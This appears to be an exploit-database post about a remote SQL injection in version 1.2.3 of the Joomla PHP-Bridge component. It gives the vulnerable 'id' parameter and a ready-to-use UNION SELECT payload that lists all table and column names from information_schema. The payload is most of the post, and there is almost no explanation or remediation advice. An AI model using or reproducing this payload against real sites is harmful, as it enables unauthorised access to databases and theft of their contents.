Joomla PHP-Bridge 1.2.3 SQL Injection

Joomla PHP-Bridge component version 1.2.3 suffers from a remote SQL injection vulnerability.


MD5 | e758c0825c15612d960b25a95f55f5f7

# # # # #
# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://www.henryschorradt.de/
# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
# Demo: http://www.henryschorradt.de/joomla-php-bridge/
# Version: 1.2.3
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
# Etc..
# # # # #


Related Posts